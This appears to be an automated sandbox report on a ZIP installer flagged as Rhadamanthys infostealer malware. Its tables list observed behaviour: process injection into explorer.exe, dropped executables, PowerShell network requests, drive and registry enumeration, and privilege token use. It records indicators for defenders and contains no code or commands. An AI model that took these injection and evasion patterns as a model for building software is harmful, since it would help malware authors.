Analysis Overview
SHA256
718dc58c02f2c98eda1eae96c5bde5e0d71bf418c483fea0eea84645b4cafae6
Threat Level: Known bad
The file x32_x64_installer.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Blocklisted process makes network request
Executes dropped EXE
Loads dropped DLL
Enumerates connected drives
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Program crash
Suspicious use of FindShellTrayWindow
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Suspicious use of UnmapMainImage
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Modifies registry class
Checks processor information in registry
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-26 12:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-26 12:12
Reported
2024-03-26 12:22
Platform
win10v2004-20240226-en
Max time kernel
570s
Max time network
566s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3400 created 2416 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
| PID 4912 created 2416 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
| PID 3456 created 2416 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
| PID 2496 created 2416 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\gPbvjrqJdNjoBNl\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b4Tvo7dAqteQ0zL\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UhwuE7JmPUqUfRj\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Ko0JPYBqUfWBZzu\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe | N/A |
Loads dropped DLL
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\D: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\D: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\D: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4644 set thread context of 3400 | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | C:\Windows\SysWOW64\explorer.exe |
| PID 4016 set thread context of 4912 | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | C:\Windows\SysWOW64\explorer.exe |
| PID 3700 set thread context of 2496 | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | C:\Windows\SysWOW64\explorer.exe |
| PID 916 set thread context of 3456 | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | C:\Windows\SysWOW64\explorer.exe |
| PID 860 set thread context of 1700 | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\page_embed_script.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\gl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\kk\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\lt\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\128.png | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ta\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\bg\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\eventpage_bin_prod.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\de\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\nl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\hi\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\el\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\sv\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\msedge_url_fetcher_1472_264658919\GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_75_4_0.crx | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\am\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\bn\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\no\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\es_419\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\id\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\uk\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ro\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\fa\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\mr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ur\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\dasherSettingSchema.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\et\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\th\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\fr_CA\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ja\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\lo\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zu\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ko\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en_CA\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pa\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pt_BR\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en_US\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\sw\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ms\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\hy\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\hu\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zh_TW\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ka\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zh_HK\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\cs\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\cy\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\eu\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\is\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ca\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\sl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pt_PT\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\af\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en_GB\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ml\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ar\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ne\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\tr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\km\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\fil\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zh_CN\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\e59d319.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e59d315.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE883.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE99D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2E4B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e59d315.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIEA59.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIEDF5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID622.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIECDB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{654024B2-0767-4BCD-BC79-7CF46AF9D5A1} | C:\Windows\system32\msiexec.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{6E140374-1889-48B5-BB86-B4871CA0CE5E} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{756DD9AC-0A57-4FD0-9B91-097FCFC96327} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{38A4DE08-9A7B-4EFD-8A8C-0382089BF6F6} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
